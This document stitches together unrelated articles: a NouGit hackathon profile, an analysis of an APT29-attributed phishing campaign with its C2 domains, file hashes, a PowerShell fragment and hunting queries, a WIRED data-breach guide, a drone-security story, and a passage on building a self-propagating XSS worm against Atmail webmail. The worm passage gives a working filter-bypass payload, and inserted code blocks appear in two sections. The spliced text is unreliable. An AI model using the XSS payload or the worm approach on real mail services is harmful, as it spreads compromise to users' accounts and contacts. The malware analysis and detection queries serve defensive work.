In the NouGit ecosystem, developers are rewarded when they write specific pieces of code. "The developer who proposes the best solution gets the bounty. So the value [of that solution] is returned to the developer in the form of compensation and reputation."

Behnke adds: "This can greatly reduce hiring friction, because project managers can see what a developer can do before paying them. Under the existing model, many open-source projects cannot attract anyone to contribute. By posting a clear bounty, the likelihood that the project gets done goes up."

Meanwhile, recording every code upload and transaction detail on the blockchain creates a "trustless" environment that keeps every project manager honest.

Behnke and his teammates, Colby Gilbert, Fred Madrid, Mike Lin and NicoLae Carabut from Moldova, combine expertise in software engineering, cryptography, fintech and UI/UX design. Their focus on improving the open-source model reflects both the organic community they formed through EOSIO and the wider San Francisco blockchain scene, and their ambition to tap blockchain's potential for social and economic change. The result is a project built from a developer's perspective, for developers.

"We are spread across the US, but we often meet at Starfish Mission, a blockchain coworking space in San Francisco," Behnke says. "We often see each other at EOS meetups, and a month before the hackathon we specifically arranged a few meetings to prepare to compete as a team."

They signed up for the hackathon "for fun". In the end, "the result far exceeded expectations".

So what did they take away from building the NouGit product? "Team up with the right people and trust each other; that is the biggest lesson," Behnke says, adding that EOSIO is the most "infectious" platform in the industry.

"We got tremendous support and very constructive feedback that kept us on the right track," he says. "And the mentors at the hackathon were the icing on the cake; they helped us make breakthroughs and go all the way."

Source: http://eos.wiki


APT29? Analysis of cyberattacks against US think tanks, non-profits and public organizations


Reuters recently reported that a hacker group launched cyberattack campaigns against multiple targets worldwide. Microsoft researchers tracked the same campaign; this article describes its details.

Researchers found that the campaign mainly targeted public institutions and non-governmental organizations such as think tanks, research centers and educational institutions, as well as private companies in the oil, gas, chemical and healthcare industries.

Third-party security researchers attributed the attack to APT29 (CozyBear), which Microsoft tracks as YTTRIUM. As of now, Microsoft researchers say there is not yet enough evidence to attribute the campaign to APT29.

Attack overview

The campaign began on the morning of November 14, 2018. Targets were mainly institutions involved in policy-making or with political influence in their region.


[Figure: distribution of phishing attacks across industries]

Although targets span industries worldwide, they are concentrated in the United States, especially around Washington, followed by Europe, Hong Kong, India and Canada.


[Figure: geographic distribution of the phishing campaign]

The spear-phishing emails imitate OneDrive sharing notifications and impersonate a US State Department employee. If the recipient clicks the link in the email, the exploitation chain starts and ultimately implants a DLL backdoor that gives the attacker remote access to the recipient's machine.


[Figure: attack chain]

Attack analysis

Delivery

The spear-phishing emails used in the attack imitate a OneDrive file-sharing notification.



The email contains a legitimate but compromised third-party link:

hxxps://www.jmj.com/personal/nauerthn_state_gov/TUJE7QJl[random string]

The attacker uses the random string to identify which target clicked the link, but every variant of the link redirects the user to the same URL:

hxxps://www.jmj.com/personal/nauerthn_state_gov/VFVKRTdRSm

When the user clicks the link, they are served a ZIP file containing a malicious LNK file. All files in the attack share the same base filename, e.g. ds7002.pdf, ds7002.zip, ds7002.lnk.

Installation

The LNK file is the first stage of the attack. It executes an obfuscated PowerShell command that extracts a base64-encoded payload from the LNK file starting at offset 0x5e2be and spanning 16632 bytes.


[Figure: encoded content in the LNK file]

The encoded payload is a heavily obfuscated PowerShell script, which is decoded and executed:


[Figure: decoded second script]

The second script extracts two additional files from the .LNK file:

ds7002.PDF (decoy PDF)

cyzfc.dat (first-stage implant)

C2

The PowerShell script creates the first-stage DLL cyzfc.dat at %AppData%\Local\cyzfc.dat. This is a 64-bit DLL that exports the function PointFunctionCall.

The PowerShell script then runs cyzfc.dat via rundll32.exe. After connecting to the first-stage C2 server pandorasong[.]com (95.216.59.92), cyzfc.dat installs the final payload through the following steps:

1. Allocate ReadWrite pages for the second-stage payload;

2. Extract the second-stage payload as a resource;

3. Take the header embedded in the first-stage payload (0xEF bytes);

4. Prepend that header to the resource, starting at byte 0x12A;

5. Decrypt the second-stage payload with a rolling XOR (ROR1) starting from key 0xC5.



The second-stage payload is an instance of Cobalt Strike, a commercial penetration testing tool, and performs the following steps:

1. Defines a local named pipe in the format \\.\pipe\MSSE-<number>-server, where <number> is a random number between 0 and 9897;

2. Connects to the pipe and writes global data of size 0x3FE00;

3. Implements a backdoor over the named pipe:

- reads content from the pipe (up to 0x3FE00 bytes) into an allocated buffer;

- XOR-decodes the payload into a new RW memory region, this time with a different key: a simple XOR with 0x7CC2885F every 4 bytes;

- changes that region to RX;

- creates a thread to run the payload.



The global data written to the pipe is in fact a third payload. It is encoded with the same XOR algorithm; once decoded, it forms a PE file with a Meterpreter header that can parse the instructions in the PE header and hand control to a reflective loader:
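For an analyst holding a memory capture of the pipe buffer, the decoding step described above (a simple XOR with 0x7CC2885F applied to every 4 bytes) is enough to recover the third-stage PE for static inspection. The following is an added example, not from the article or Microsoft, that implements that decode and checks for the "MZ" signature one expects once decoding succeeds; the key byte order is assumed to be little-endian (a native Windows DWORD), the function names are this example's own, and the sample buffer is constructed, not a real capture.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// cobaltKey is the 4-byte XOR key described for the pipe-delivered stage.
const cobaltKey = 0x7CC2885F

// xorDword XORs buf in place with a 32-bit key applied to every 4-byte
// group. The key is laid out little-endian (assumption of this example);
// trailing bytes that do not fill a whole dword are XORed with the
// corresponding leading key bytes.
func xorDword(buf []byte, key uint32) []byte {
	var kb [4]byte
	binary.LittleEndian.PutUint32(kb[:], key)
	for i := range buf {
		buf[i] ^= kb[i%4]
	}
	return buf
}

// decodeStage decodes a copy of a captured pipe buffer and reports whether
// the result begins with the "MZ" signature of a PE image, which is what the
// third-stage payload is expected to look like after decoding.
func decodeStage(captured []byte, key uint32) ([]byte, bool) {
	out := xorDword(append([]byte(nil), captured...), key)
	isPE := len(out) >= 2 && out[0] == 'M' && out[1] == 'Z'
	return out, isPE
}

func main() {
	// Constructed sample: a fake 8-byte "MZ" header encoded with the same XOR
	// (XOR is its own inverse, so encoding and decoding are the same operation).
	sample := xorDword([]byte("MZ\x90\x00\x03\x00\x00\x00"), cobaltKey)
	out, isPE := decodeStage(sample, cobaltKey)
	fmt.Printf("%x pe=%v\n", out, isPE)
}
```

Because XOR with a fixed key is symmetric, the same function also lets a detection engineer confirm a hypothesis the other way round: a buffer that decodes to a valid PE under this exact key is a strong indicator of this specific tooling.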



The third payload finally loads and connects to its C2 server, whose address is embedded in the PE file's configuration. The configuration is XOR-decrypted when the third payload runs:



The configuration itself contains the C2 information:



Cobalt Strike is a feature-rich penetration testing tool that gives a remote attacker a wide range of capabilities, including privilege escalation, capturing user input, executing arbitrary commands via PowerShell or WMI, reconnaissance, communicating with C2 servers over various protocols, and downloading and installing malware.

Indicators of attack

Files (SHA-1)

ds7002.ZIP: cd92f19d3ad4ec50f6d19652af010fe07dca55e1

ds7002.LNK: e431261c63f94a174a1308defccc674dabbe3609

ds7002.PDF (decoy PDF): 8e928c550e5d44fb31ef8b6f3df2e914acd66873

cyzfc.dat (first-stage): 9858d5cb2a6614be3c48e33911bf9f7978b441bf

URLs

hxxps://www.jmj[.]com/personal/nauerthn_state_gov/VFVKRTdRSm

C&C servers

pandorasong[.]com (95.216.59.92) (first-stage C&C server)

Security teams can hunt for the related activity in their networks to determine whether they were targeted or compromised:

//Query 1: Events involving the DLL container
let fileHash = "9858d5cb2a6614be3c48e33911bf9f7978b441bf";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents,
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

//Query 2: C&C connection
NetworkCommunicationEvents
| where EventTime > ago(10d)
| where RemoteUrl == "pandorasong.com"

//Query 3: Malicious PowerShell
ProcessCreationEvents
| where EventTime > ago(10d)
| where ProcessCommandLine contains
"-noni -ep bypass $zk=' JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0"

//Query 4: Malicious domain in default browser commandline
ProcessCreationEvents
| where EventTime > ago(10d)
| where ProcessCommandLine contains
"https://www.jmj.com/personal/nauerthn_state_gov"

//Query 5: Events involving the ZIP
let fileHash = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents,
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

Data Breaches: The Complete WIRED Guide


Another week, another massive new corporate security breach that exposes your personal data. Names, email addresses, passwords, Social Security numbers, dates of birth, credit card numbers, banking data, passport numbers, phone numbers, home addresses, driver’s license numbers, medical records―they all get swept up by shadowy, amorphous hackers for fraud, identity theft, and worse. Sometimes the affected company will send you an email suggesting that you change a password or credit card number, but for the most part, these incidents are invisible―until they aren’t.

Think of data breaches as coming in two flavors: breaches of institutions that people choose to entrust with their data―like retailers and banks―and breaches of entities that acquired user data secondarily―like credit bureaus and marketing firms. Unfortunately, you can’t keep your information perfectly safe: It is often impossible to avoid sharing data, especially with organizations like governments and health insurers. Furthermore, in cases where a company or institution gives your information to an additional party, you’ve often agreed to sharing more data than you realize by clicking "I accept" on a dense user agreement.

Many of these incidents don’t necessarily even involve hackers. Data “exposures” occur when information that should have been locked down was accessible, but it’s unclear if anyone actually stole it.

Even after a data breach has occurred, though, and an unauthorized actor definitely has your data, you won’t necessarily see an immediate negative impact. Hackers who steal a trove of login credentials, for example, may quietly use them for under-the-radar crime sprees instead of selling or publishing the data. As a result, the repercussions of a breach can be very delayed, sometimes not fully manifesting for years.

Attackers tend to capitalize on certain types of data right away, namely financial information like credit card numbers. But some troves of data disappear into the ether, becoming a sort of ticking time bomb. Yet victims of identity theft know the consequences of data breaches intimately and painfully. They may have their credit wrecked by thieves, lose all their money, or be dogged for years by a shadow hand meddling in their affairs and opening digital accounts in their name.

The problem is so abstract and far-reaching that you would be forgiven for feeling that it’s not worth grappling with at all. Unfortunately for victims, there is no such thing as perfect security, and no way to eliminate absolutely all data breaches. But massive institutional breaches don’t need to happen as often as they do. Many occur not because of complex and sophisticated hacking but because organizations have made basic and potentially avoidable mistakes in implementing their security schemes. They’re low-hanging fruit for hackers to pluck.

Yes, it’s a difficult, never-ending process for a large organization to secure its inevitably sprawling networks, but for decades many institutions just haven’t really tried. They’ve gone through some of the motions without actually making digital security a spending priority. Over the past 10 years, however, as corporate and government data breaches have ramped up―impacting the data of billions of people―institutional leaders and the general public alike have finally begun to understand the urgency and necessity of putting security first. This increased focus is beginning to translate into some concrete data protections and security improvements. But collective inaction for decades has created a security deficit that will take significant time and money to make up. And the reality that robust digital security requires never-ending investment is difficult for institutions to accept.

The History of Data Breaches

Data breaches have been increasingly common and harmful for decades. A few stand out, though, as instructive examples of how breaches have evolved, how attackers are able to orchestrate these attacks, what can be stolen, and what happens to data once a breach has occurred.

Digital data breaches started long before widespread use of the internet, yet they were similar in many respects to the leaks we see today. One early landmark incident occurred in 1984, when the credit reporting agency TRW Information Systems (now Experian) realized that one of its database files had been breached. The trove was protected by a numeric passcode that someone lifted from an administrative note at a Sears store and posted on an “electronic bulletin board”―a sort of rudimentary Google Doc that people could access and alter using their landline phone connection. From there, anyone who knew how to view the bulletin board could have used the password to access the data stored in the TRW file: personal data and credit histories of 90 million Americans. The password was exposed for a month. At the time, TRW said that it changed the database password as soon as it found out about the situation. Though the incident is dwarfed by last year’s breach of the credit reporting agency Equifax (discussed below), the TRW lapse was a warning to data firms everywhere―one that many clearly didn’t heed.

Large-scale breaches like the TRW incident occurred sporadically as years went by and the internet expanded. By the early 2010s, as mobile devices and the Internet of Things greatly expanded interconnectivity, the problem of data breaches became especially urgent. Stealing username/password pairs or credit card numbers―even breaching a trove of data aggregated from already public sources―could give attackers the keys to someone’s entire online life. And certain breaches in particular helped fuel a growing dark web economy of stolen user data.

What Counts as a Data Breach?

A data breach occurs any time an entity accesses information it wasn’t meant to. If someone inconspicuously looks over your shoulder at your smartphone and reads what you’re typing, that’s a data breach. If someone a block away uses binoculars to look through your window and see what you’re watching on TV, that’s a data breach as well. You may not think it matters if someone knows you like The Good Place, but if it isn’t your intent for people to see what you’re watching, it’s a violation of your expectations.

One of these incidents was a breach of LinkedIn in 2012 that initially seemed to expose 6.5 million passwords. The data was hashed, or cryptographically scrambled, as a protection to make it unintelligible and therefore difficult to reuse, but hackers quickly started “cracking” the hashes to expose LinkedIn users’ actual passwords. Though LinkedIn itself took precautions to reset impacted account passwords, attackers still got plenty of mileage out of them by finding other accounts around the web where users had reused the same password. That all too common lax password hygiene means a single breach can haunt users for years.

And What Counts as Exposure?

Think of an exposure as putting that same window at street level. Anyone walking by could see what’s on your TV. Whether they actually do doesn’t matter―the risk is there. When sensitive data like medical records or banking information gets exposed, the stakes are high.

The LinkedIn hack also turned out to be even worse than it first appeared. In 2016 a hacker known as “Peace”started selling account information, particularly email addresses and passwords, from 117 million LinkedIn users. Data stolen from the LinkedIn breach has been repurposed and re-sold by criminals ever since, and attackers still have some success exploiting the data to this day, since so many people reuse the same passwords across numerous accounts for years.

Then What?

A common reassurance after a data exposure is that there is no evidence the data was stolen. To a degree, it is possible to review access logs and other system indicators to determine this, but generally organizations have no way of knowing for certain what went on while they weren’t watching. This is what makes data exposures such a big problem, whether it’s through your window or via a database that a company left accessible online: It’s always possible that someone realized they could peek in and exfiltrated some information without anyone realizing.

Data breaches didn’t truly become dinner table fodder, though, until the end of 2013 and 2014, when major retailers Target, Neiman Marcus, and Home Depot suffered massive breaches one after the other. The Target hack, first publicly disclosed in December 2013, impacted the personal information (like names, addresses, phone numbers, and email addresses) of 70 million Americans and compromised 40 million credit card numbers. Just a few weeks later, in January 2014, Neiman Marcus admitted that its point-of-sale systems had been hit by the same malware that infected Target, exposing the information of about 110 million Neiman Marcus customers, along with 1.1 million credit and debit card numbers. Then, after months of fallout from those two breaches, Home Depot announced in September 2014 that hackers had stolen 56 million credit and debit card numbers from its systems by installing malware on the company’s payment terminals.

An even more devastating and sinister attack was taking place at the same time, though. The Office of Personnel Management is the administrative and HR department for US government employees. The department manages security clearances, conducts background checks, and keeps records on every past and present federal employee. If you want to know what’s going on inside the US government, this is the department to hack. So China did.

Hackers linked to the Chinese government infiltrated OPM’s network twice, first stealing the technical blueprints for the network in 2013, then initiating a second attack shortly thereafter in which they gained control of the administrative server that managed the authentication for all other server logins. In other words, by the time OPM fully realized what had happened and acted to remove the intruders in 2015, the hackers had been able to steal tens of millions of detailed records about every aspect of federal employees’ lives, including 21.5 million Social Security numbers and 5.6 million fingerprint records. In some cases, victims weren’t even federal employees, but were simply connected in some way to government workers who had undergone background checks. (Those checks include all sorts of extremely specific information, like maps of a subject’s family, friends, associates, and children.)

Pilfered OPM data never circulated online or showed up on the black market, likely because it was stolen for its intelligence value rather than its street value. Reports indicated that Chinese operatives may have used the information to supplement a database cataloging US citizens and government activity.

Today, data breaches are so common that the cybersecurity industry even has a phrase―“breach fatigue”―to describe the indifference that can come from such an overwhelming and seemingly hopeless string of events. And while tech companies, not to mention regulators, are starting to take data protection more seriously, the industry has yet to turn the corner. In fact, some of the most disheartening breaches yet have been disclosed in the last couple of years.

Yahoo lodged repeated contenders for the distinction of all-time biggest data breach when it made an extraordinary series of announcements beginning in September 2016. First, the company disclosed that an intrusion in 2014 compromised personal information from 500 million user accounts. Then, two months later, Yahoo added that it had suffered a separate breach in August 2013 that exposed a billion accounts. Sounds like a pretty unassailable lead in the race to the data-breach bottom, right? And yet! In October 2017, the company said that after further investigation it was revising its estimate of 1 billion accounts to 3 billion―or every Yahoo account that existed in August 2013.

There are few companies that even have billions of user accounts to lose, but there are still other ways for a breach to be worse than the Yahoo debacles. For example, the credit monitoring firm Equifax disclosed a massive breach at the beginning of September, which exposed personal information for 147.9 million people. The data included birth dates, addresses, some driver's license numbers, about 209,000 credit card numbers, and Social Security numbers―meaning that almost half the US population potentially had their crucial secret identifier exposed. Because the information stolen from Equifax was so sensitive, it's widely considered the worst corporate data breach ever. At least for now.

Equifax also completely mishandled its public disclosure and response in the aftermath. The site the company set up for victims was itself vulnerable to attack, and it asked for the last six digits of people's Social Security numbers to check if their data had been impacted by the breach. This meant that Equifax was asking Americans to trust them with their data all over again. Equifax also made the breach-response page a stand-alone site, rather than part of its main corporate domain―a decision that invited imposter sites and aggressive phishing attempts. The official Equifax Twitter account even mistakenly tweeted the same phishing link four times. Four. Luckily, in that case, it was just a proof-of-concept research page and not an actual malicious site.

There have since been numerous indications that Equifax had a dangerously lax security culture and lack of response procedures in place. Former Equifax CEO Richard Smith told Congress in October 2017 that he usually only met with security and IT representatives once a quarter to review the company's security posture. And hackers got into Equifax's systems for the breach through a known web framework vulnerability for which a patch had been available for months. A digital platform used by Equifax employees in Argentina was even protected by the ultra-guessable credentials "admin, admin"―a truly rookie mistake.

If any good came from the Equifax breach, it was that the sheer severity may have served as the wake-up call corporate America needed. On the other hand, a year after that breach, the frequency of successful attacks doesn’t seem to have abated. And the eeriest thing about the Equifax breach? The data still hasn’t surfaced. Data aggregators like Equifax, who pull in an enormous amount of public and private information from myriad sources, have become a single point of failure of the digital age. More and more often, attackers target data analytics companies as a one-stop-shop for valuable information. But hackers still have their sights set on the true industry giants as well―if they can find a way in. Just weeks ago, Facebook disclosed its first-ever true data breach, in which attackers gained access to 30 million user authorization tokens. This meant that the hackers could access users’ Facebook accounts and exfiltrate a significant portion of their personal data. Facebook is investigating the incident with the FBI and has not yet said who was behind it or what their goals were in launching the attack.

And the security breach train rolls on. Within a few days of each other this month, Marriott and Quora both announced large breaches impacting more than 100 million users. In Marriott’s case, the intrusion occurred in the Starwood Preferred Guest system and persisted for four years. Marriott acquired Starwood in September 2016, two years after attackers would have first infiltrated, but it then persisted for two more years on Marriott’s watch. The breach exposed various combinations of personal details, including hundreds of millions of passport numbers, from as many as 500 million customers overall, making it one of the three largest known breaches to date.

The Future of Data Breaches

Attackers are able to perpetrate most current data breaches relatively easily by exploiting an institution’s basic security oversights―that’s what happened with Home Depot, OPM, and Equifax. If businesses and other institutions learned from these organizations’ mistakes, there could be a real reduction in the number of data breaches that occur overall. But improvement doesn’t come from making breaches impossible. The best improvements come from accepting the possibility of breach and significantly raising the barrier to entry or the resources required to carry one off. This would deter many would-be attackers, because unskilled hackers (or those who are simply idly poking around) wouldn’t be able to find as many blatant vulnerabilities to easily exploit.

An important concept in security, though, is the idea of the cat and mouse game. For determined, motivated, and well-resourced attackers, improved defenses spur malicious innovation. This is why security is an endless expense that institutions try to minimize, cap, or avoid altogether―defenders need to think of everything, while attackers only need to find one small mistake. An unpatched web server or an employee clicking a malicious link in a phishing email can be all it takes.

That’s also why some of the most groundbreaking examples of next-generation hacking come from targeted attacks to surveil high-profile individuals and groups, often political candidates, dissidents, activists, or spies attempting to infiltrate each other’s organizations. Hackers working to carry out these types of high-priority attacks will develop or pay large sums of money for so-called zero-day exploits. These consist of two parts: information about an undisclosed vulnerability in a system, and software that is programmed to take advantage of that flaw to give some type of increased system access or control to whoever deploys the exploit. A software developer can’t defend a vulnerability they don’t know about, so zero-day exploits push the limits of what’s possible for attackers by giving them a secret path into a network or database.

What Should Institutions Do?

Lock It Down

Require users to set up strong, unique passwords and two-factor authentication to access network services.

Keep 'Em Out

Implement access controls so everyone can’t access everything. Users should only be able to see the content and applications they need.

Slice It Up

Segment enterprise networks so that sensitive data and operations run in different digital areas and aren’t accessible from parts of the network that are low-sensitivity.

Update It Quick

Apply software updates as soon as they’re available. For real.

More attackers may be forced to use zero-day exploits to carry out future breaches, increasing the resources required, if businesses, governments, and other institutions succeed in substantially improving their baseline cybersecurity postures through initiatives like consistent patching and network access control. But for now, enough easy targets remain that attackers don’t need to work very hard or spend a lot of money to perpetrate massive data breaches. Even just using publicly available internet scanning tools can reveal unprotected devices and databases where valuable information is tantalizingly exposed.

Until that changes, US citizens and permanent residents would have more protection against fraud and identity theft if the US government would replace Social Security numbers. These strings of digits were never meant to act as universal identifiers, much less as secure authenticators, and it is impossible for people to keep a set of digits secret when they are also being asked to share the number repeatedly throughout their lives. Instead, the US government should offer (as other countries do) a purpose-built universal identity scheme that incorporates numerous, diverse authenticators. That way, even if hackers compromise one piece of information, people can still regain control of their identities.

Ideally, companies and other institutions that hold data would commit to invest forever in rigorously locking their systems down. But organizations always vacillate between factoring in cost, ease of use, and risk. There’s no easy way to reconcile the three. And even if there were, no security scheme is ever perfect. The best way to minimize the impact of a mega-breach, then, is not just to reduce the number of incidents, but to better manage the inevitable fallout.

Sunflower Labs is building a drone surveillance system for high-end homes

Tucked away high in the residential hills of suburban San Carlos, California, is a three-bedroom home with its own autonomous aerial security system. The house is no different than any other residence on the quiet street full of well-manicured lawns and spacious views of the Pulgas Ridge Preserve.

But it just happens to be the personal home of former Evernote executive and Sunflower Labs CEO Alex Pachikov. He’s turned the house into a prototype home for the Sunflower system, which uses a series of motion and vibration sensors in conjunction with an autonomous drone to monitor all activity, down to measuring the footsteps on the grass outside his front door.

“We have a core belief that a lot of value is hidden not just in the vision spectrum, but the motion and vibration spectrum,” Pachikov tells me before using a Siri integration on his iPhone to launch the drone from his backyard with a voice command.

Part of the Sunflower system involves the Sunflowers, the small, roughly 1.5-meter bulbs filled with sensors that are disguised as garden lights. “The sensors can detect people, pets, and cars. Vibration sensors detect footsteps, car engines... even if you’re running a coffee maker.” The Sunflowers are placed around the home to help create a map and triangulate people and other objects within the space. But the real draw of the Sunflower system is the drone that flies itself. The drone is called the Bee, and its base station is called the Hive.


The whole system works together by letting the Bee leave its station and then fly around the home capturing video by using the Sunflowers to perform path planning and relying on its built-in cameras and sensors to avoid obstacles. When it’s ready to land, you press a button on the Sunflower mobile app, and the drone docks itself into the funnel-shaped landing zone of the base station, which also doubles as a conductive wireless charger.

In practice, the Sunflower system would alert a homeowner of something unexpected moving around the house, thanks to the ground sensors. They would then manually choose whether to deploy the drone, which would then stream a live 1080p video feed to your phone or tablet. Once the drone is docked again, the video is saved to the cloud. The company says it’s designing the system to be deployable by both homeowners and third-party monitoring services, like ADT, in the event that you’re asleep or away from home and not monitoring your phone when the activity occurs.

“The security industry is just absolutely ripe for disruption. They haven’t done anything particularly new in 30 years,” Pachikov says. “It’s door and window sensors, and CCTV cameras.” Instead of having to go back and see what went wrong after an intruder has already broken in, or needing to have someone monitor the system all of the time, Pachikov says he “wants to know what’s happening around my property before it’s at my door.” For instance, if someone is scoping out the house to see whether it could be a viable target at some later date.


Although the concept of operating your own personal drone surveillance system can seem outlandish and excessive, Pachikov sees it as a viable and new type of deterrent. “Current security systems don’t provide any deterrents. Mostly it’s a 120-decibel alarm that blows out your eardrums because it’s mostly false alarms,” he says. “If the drone comes out, it’s very similar to a security guard coming out, or at the very least, a dog barking.” The noise is a deterrence element, too; in my experience, it was about as loud as other consumer drones on the market. Pachikov says they plan on reducing the noise a bit, and that using 3D-printed parts for the prototype is one reason why it’s louder than the company eventually intends it to be.

In this way, Sunflower Labs represents a new kind of drone company. It’s one that specializes less in the physical hardware and camera capabilities of an unmanned aerial vehicle (UAV), like Chinese drone giant DJI, but in the possibilities a drone provides you as a consumer if it’s specifically outfitted to fulfill a certain need. Similar to Skydio, an AI-focused startup that makes a self-flying drone for action sports enthusiasts , Sunflower is taking advantage of the fast-maturing drone market to sell the promise of aerial video surveillance to both the home consumer and the security industry at large.

Sunflower Labs has been working on the project for nearly three years now with more than $6 million in funding . Investors include General Catalyst ― former Evernote CEO and co-founder Phil Libin, who now works as an adviser at GC, helped close the seed round ― and Stanley Black & Decker, the industrial tool maker that also happens to be a major supplier of commercial security systems. The company is split between 10 employees in Zurich, Switzerland, and another eight in San Francisco.

The goal with the Sunflower system right now is to sell it to consumers on a subscription, while pursuing commercial applications in the future. Pachikov estimates that the whole package will cost someone around a few hundred dollars a month, and it will include the Sunflower sensor lights, the Hive base station, and a Bee drone.

Pachikov has no delusions about the product or who it is designed for. Sunflower doesn’t want every home to be outfitted with a security drone. “We’re going for higher-end, affluent people who are tech-savvy and eager to do this,” Pachikov says. “Once we’re self-sustaining, we’re going to drive the cost down and go for more regular homes.”


The goal is to target low- to medium-density areas; in other words, suburban America. Pachikov says Sunflower already has thousands of customers lined up to purchase the system with its subscription model. Down the line, Pachikov says its ties with Stanley Black & Decker will open up new avenues into commercial drone security. The hope is that, unlike standard, wired security systems or even the AI-driven Knightscope security robots , a drone is a better and more efficient way to surveil a scene, cover large amounts of ground quickly, and avoid being tampered with by an intruder.

There is, of course, the matter of Federal Aviation Administration regulations , which make commercial drone operations a bit difficult without jumping through some serious regulatory hoops. There are also rules for consumer and hobbyist drone flights concerning flying outside an operator’s line of sight as well as at night. (The Sunflower drone is designed to capture video at night and operate autonomously in the dark, as well as other tricky weather conditions like rain and wind.)

“The regulations to allow things like this are imminent,” he says. Currently, in a homeowner setting, you can fly a drone on your own property as a hobbyist. Eventually, Pachikov wants the drone to be able to deploy itself without requiring the manual go-ahead from the mobile app. To get there, Sunflower will have to bring the weight of its drone down a bit, as Pachikov says a device under half a pound would bring the UAV into the least restrictive FAA category. “We’re at three pounds. Hopefully, we drive the weight down and they raise the limit.”

What is clear is that, regardless of the regulatory road map, security drones are indeed on the way, and Sunflower wants to be at the forefront of both the consumer and commercial market. And while the Sunflower system may be for wealthy homeowners for now, Pachikov sees a broader audience on the horizon. “I see it like the Tesla Roadster. It’s a fun proof of concept, but it’s not a consumer car. We see this [the Sunflower system] as our Roadster,” he says.

Photography by Nick Statt / The Verge

Step by Step: Building an XSS Worm on Atmail

Disclaimer: This article is for educational and technical discussion purposes only. Do not use it for illegal purposes.

Introduction

Atmail is a popular cloud service and email hosting provider. Many companies, hosting providers and ISPs use Atmail today, including DreamHost, LegalShield (US), m:tel (Bosnia), iiNet and Optus (Australia).


As an Atmail user on DreamHost, I had seen several impressive email-based cross-site scripting (XSS) attacks while working on bug bounty programs. I tried to find security vulnerabilities in their webmail client, and after a few hours I had a working payload. But I wanted to go a step further and build an old-school XSS worm. The best-known XSS worm is the one that infected MySpace in 2005, and in 2014 a new variant of it successfully hit TweetDeck.

In this article, I will show how to build an XSS payload that propagates itself through the victim's contacts.

Test Environment

Before starting, we need a simple test environment. We can send an email with the following command, with the XSS test payload embedded in the mail body:

cat content | mail -a "Content-type: text/html" -s "test" victim1@zjulian.com

Next, use Firefox's developer tools to see how the XSS payload is rendered in the webmail client's DOM.

Building the XSS Payload

The first step is to build an XSS payload that bypasses Atmail's content filter. I started by sending an email containing every valid HTML tag to see which ones made it through, although I only planned to use the <img> tag. The <img> tag is well suited to building an XSS payload, but before the XSS fires the victim has to choose to display images in Atmail. So tags whose content renders without user interaction would improve the quality of the payload.

Next, I looked at how Atmail sanitizes the payload. To filter mail content and show well-formed markup in the user's browser, Atmail rewrites characters and HTML attributes in the <img> tag. I found that Atmail only accepts the src, alt, longdesc, style, height and width attributes. I also noticed that Atmail converts single quotes to double quotes, removes onerror events, and removes any <img> tag that has no src attribute.

Although the onerror event is removed, mixing single and double quotes in the same <img> tag might be enough to bypass Atmail's filter. It turned out to work:

<img longdesc="src='x'onerror=alert(document.domain);//><img "src='showme'>

Here is what is rendered in the webmail client:

<img longdesc="src=" images="" stop.png"=""onerror="alert(document.domain);//"" src="x"alt="showme">
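
The bypass above works because the sanitizer's parse of the tag and the browser's parse of the sanitizer's output disagree: the allowlist sees only longdesc and src, but the quote rewriting moves the end of the longdesc value, and onerror becomes a real attribute. The following is an added example, not code from the original article or from Atmail, that models this failure. The tokenizer follows browser attribute rules only as far as needed here (names, `=`, quoted and unquoted values, first duplicate wins), and both serializers are assumed filter designs, not Atmail's implementation. The variant payload is constructed for the example; it uses the same mechanism as the article's payload but is laid out so the effect is easy to assert on.

```javascript
// Added example; not code from the original article or from Atmail.
// It models the sanitizer failure discussed above: an attribute allowlist that
// parses the tag correctly but then re-emits values with single quotes turned
// into double quotes and no escaping. The tokenizer follows browser attribute
// rules only as far as needed here (names, '=', quoted/unquoted values, first
// duplicate wins); both serializers are assumed designs, not Atmail's code.

const ALLOWED_IMG_ATTRS = new Set(['src', 'alt', 'longdesc', 'style', 'height', 'width']);

const isSpace = (c) => c === ' ' || c === '\t' || c === '\n' || c === '\r';

// Tokenize the attribute section of a start tag (the text after "<img").
function tokenizeAttributes(tagBody) {
  const attrs = [];
  const n = tagBody.length;
  let i = 0;
  while (i < n) {
    while (i < n && isSpace(tagBody[i])) i++;
    if (i >= n) break;
    // A name runs until whitespace or '='; stray quotes stay part of the name,
    // as in a browser (a parse error, not a separator).
    let name = '';
    while (i < n && !isSpace(tagBody[i]) && tagBody[i] !== '=') name += tagBody[i++];
    while (i < n && isSpace(tagBody[i])) i++;
    let value = '';
    if (i < n && tagBody[i] === '=') {
      i++;
      while (i < n && isSpace(tagBody[i])) i++;
      const quote = tagBody[i];
      if (quote === '"' || quote === "'") {
        i++;
        while (i < n && tagBody[i] !== quote) value += tagBody[i++];
        i++; // closing quote
      } else {
        while (i < n && !isSpace(tagBody[i])) value += tagBody[i++];
      }
    }
    if (name) attrs.push({ name: name.toLowerCase(), value });
  }
  return attrs;
}

// The attribute set a browser would end up with: first occurrence of a name wins.
function browserView(tagBody) {
  const view = {};
  for (const { name, value } of tokenizeAttributes(tagBody)) {
    if (!Object.prototype.hasOwnProperty.call(view, name)) view[name] = value;
  }
  return view;
}

function keepAllowed(attrs) {
  return attrs.filter((a) => ALLOWED_IMG_ATTRS.has(a.name));
}

// Assumed naive serializer: wrap every value in double quotes after turning
// single quotes into double quotes, without escaping the quote it uses.
function naiveSerialize(attrs) {
  return attrs.map((a) => ` ${a.name}="${a.value.replace(/'/g, '"')}"`).join('');
}

// Hardened serializer: escape the value for the double-quoted context it is
// emitted in, so nothing inside it can end the attribute early.
function safeSerialize(attrs) {
  const esc = (v) => v.replace(/&/g, '&amp;').replace(/"/g, '&quot;');
  return attrs.map((a) => ` ${a.name}="${esc(a.value)}"`).join('');
}

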